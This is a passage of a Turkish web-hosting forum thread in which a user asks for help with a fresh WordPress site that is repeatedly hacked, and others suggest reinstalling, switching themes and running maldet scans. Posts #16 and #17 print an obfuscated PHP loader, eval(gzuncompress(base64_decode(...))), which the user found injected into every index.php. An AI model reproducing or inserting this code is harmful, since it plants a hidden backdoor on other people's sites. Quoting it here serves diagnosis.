0
Kayıt Ol

Wordpress Sitem 2 Günde 2 Kere Hack Yedi.

30

2.184

  • 05-03-2019, 12:12:05
    #10
    akkus71
    akkus71
    Üyeliği durduruldu
    Sıfırdan kurulum yapın, ve demoyu koplme aktarmayın, orijinal sitesinden indirin. Hâlâ devam ediyorsa sunucunuz shell yemiş demektir.
  • 05-03-2019, 12:16:19
    #11
    bulutaylak
    bulutaylak
    Alicanklc adlı üyeden alıntı: mesajı görüntüle
    Sucuri ile wp-ıncludes yazmalarını falan kapatin hocam bunlar plugins hello.php ve wp-includesi silip indirip oyle atin ordan yapiyolar cok kişide karşilaştim kimisi virüs programina kimisi böyle yönlendiriyor kurtardim ama çok ugrastirdi.
    Hocam şöyle bir şey var, sitenin domaini bile 3 gün önce alındı, yani siteyi nerden buldunuz da saldırdınız bana çok garip geliyor. Tema sitesi de dandik bir yer değil, bilindik bir yer ama oradan oluğuna adım gibi eminim. Adamlara da mail attım durumu izah ettim. Şimdi sıfırdan kurulum yapıp, durumu yine buraya aktaracağım.
    hasanbugra adlı üyeden alıntı: mesajı görüntüle
    Merhaba yedek almıyacaksınız yalnız, Sektöre ilk girdiğim zaman basit bir deneme için açtığım web sitemde bu tarzda bir hack yemiştim ne kadar temizledik neler yaptıysak yapalım 1 saat sonra otamatikmen hack yiyor, siteyi komple silip yeniden kurunuz. problem çözülecektir ayrıca temayı kurduktan sonra ssh bağlantınız var madem bir malware taraması yapınız.
    Hocam teşekkür ederim, ben temayı değiştirip denemeyi düşünüyorum çünkü 4. defa uğraşmak istemiyorum. Şu malware taraması hakkında bir şey bilmiyorum, sunucuya destek açsam yardımcı olurlar mı acaba?
  • 05-03-2019, 13:45:14
    #12
    hasanbugra
    hasanbugra
    Merhaba, evet sunucu firmasına destek talebi açınız , yardımcı olacaklardır.
    Eğer yardımcı olmazlar ise ssh bağlantınız var ise yazın yardımcı olabilirim.
    İyi Çalışmalar,
  • 05-03-2019, 15:47:23
    #13
    sKaracanx
    sKaracanx
    Üyeliği durduruldu
    Merhaba, bu tarz problemlerinizde kalıcı ve profesyonel olarak destek almak isterseniz imzam üzerindeki konular vasıtasıyla iletişime geçebilirsiniz. Ek olarak referans ve müşteri yorumlarıma konular üzerinden ulaşabilirsiniz.
  • 05-03-2019, 16:53:36
    #14
    bulutaylak
    bulutaylak
    Çok teşekkür ederim arkadaşlar, şuan başka bir tema kurdum ve beklemeye aldım. Bu arada bu ay kurulan 3 veya 4. wp site bu, yani diğerleri de aynı sunucuda sonuçta ve hiç sorun yaşamadım. Burada temanın import edilen dosyalarından bir sıkıntı olduğunu düşünüyorum, ilgili kişilere mail attım ama onlar da tipik cevap olarak sunucunuzda bir sorun olabilir dediler.



    Evet dün kurduğum wordpress sistemine farklı bir tema yükledim ve beklemeye bıraktım. Bugün yine aynı sorunların tekrar ettiğini gördüm ve sorunun sunucuda oludğunu anladık. Sunucu firmasına durumu izah ettiğimde malware taraması yapmamı istediler, fakat SSH riskli bir ekran olduğu için onlardan rica ettim, bana böyle bir desteklerinin olmadığını söylediler. Geçiştirmek için mi söylendi yoksa gerçekten sunucu firmaları bunun desteğini vermiyor mu?
  • 06-03-2019, 14:09:26
    #15
    hasanucar
    hasanucar
    Üyeliği durduruldu
    Aynı temayı ücretli kullanın. ücretsiz kullanmak istiyorsanız eğer başka bir yerden temin etmeye çalışın. Sorun tamamen temada. Tema dosyalarına gerekli işlem yapılmıştır zaten. Yoksa dediğiniz gibi site adresi yeni site yeni sunucu sizin nerden bulacak hem bulsa bile demo kurulumu yapılmış siteyi neden hacklesin.
  • 07-03-2019, 13:01:31
    #16
    bulutaylak
    bulutaylak
    Dün sunucuda maldet taraması yaptım, 2 tane zararlı yazılım bulundu ve temizlendi. Tekrar her şeyi sıfırladım, panel ftp giriş şiflerine kadar. Wordpress'i kurdum ve tema bile yüklemeden öylece bıraktım. Bugün yine sitenin hacklendiğini gördüm, çıldırmak üzereyim az kaldı Dosyaları detaylıca inceledim, uploads klasörüne bir dosya yüklenmiş tusi.zip adında. Daha sonra themes klasöründe de tusi adında tema yüklendiğini ve 2 tane de farklı dosya olduğunu gördüm BURAYA TIKLAYIN. Yüklenen dosya açılmış ve tema klasörüne yerleşmiş, ordan sonra tüm index.php dosyalarının başına şifrelenmiş bir kod parçacığı yerleştiğini gördüm.
    Yani tüm dosyaları sarmış bir virüsten bahsediyoruz.
    <?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>
    Bir de wordpress sitesinde yayınlanan ŞU tema yüklenmiş sanırım, çünkü screenshot.png dosyalarına baktım bu tema yani. Bunu nasıl çözebilirim bilgisi olan var mı acaba? Yeniden kurulum bir işe yaramıyor, maldet taraması yaptım tekrar her şey temiz görünüyor. Yardımlarınızı bekliyorum @hasanucar; @GiRGiN; @hasanbugra; @akkus71; @Alicanklc;
  • 07-03-2019, 13:26:05
    #17
    hasanbugra
    hasanbugra
    bulutaylak adlı üyeden alıntı: mesajı görüntüle
    Dün sunucuda maldet taraması yaptım, 2 tane zararlı yazılım bulundu ve temizlendi. Tekrar her şeyi sıfırladım, panel ftp giriş şiflerine kadar. Wordpress'i kurdum ve tema bile yüklemeden öylece bıraktım. Bugün yine sitenin hacklendiğini gördüm, çıldırmak üzereyim az kaldı Dosyaları detaylıca inceledim, uploads klasörüne bir dosya yüklenmiş tusi.zip adında. Daha sonra themes klasöründe de tusi adında tema yüklendiğini ve 2 tane de farklı dosya olduğunu gördüm BURAYA TIKLAYIN. Yüklenen dosya açılmış ve tema klasörüne yerleşmiş, ordan sonra tüm index.php dosyalarının başına şifrelenmiş bir kod parçacığı yerleştiğini gördüm.
    Yani tüm dosyaları sarmış bir virüsten bahsediyoruz.
    <?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>
    Bir de wordpress sitesinde yayınlanan ŞU tema yüklenmiş sanırım, çünkü screenshot.png dosyalarına baktım bu tema yani. Bunu nasıl çözebilirim bilgisi olan var mı acaba? Yeniden kurulum bir işe yaramıyor, maldet taraması yaptım tekrar her şey temiz görünüyor. Yardımlarınızı bekliyorum @hasanucar; @GiRGiN; @hasanbugra; @akkus71; @Alicanklc;
    Merhaba,

    Büyük İhtimalle sunucunuzda bulunan diğer bir siteden geçiş yapabiliyorlar, sunucu üzerinde site bazlı değil de bütün sunucuyu maldet ile tarayabilirmisiniz.
  • 07-03-2019, 13:33:19
    #18
    bulutaylak
    bulutaylak
    hasanbugra adlı üyeden alıntı: mesajı görüntüle
    Merhaba,

    Büyük İhtimalle sunucunuzda bulunan diğer bir siteden geçiş yapabiliyorlar, sunucu üzerinde site bazlı değil de bütün sunucuyu maldet ile tarayabilirmisiniz.
    Evet tüm sunucuda sağladım taramayı. Defalarca taradım temiz görünüyor 

    maldet -a /home/?/public_html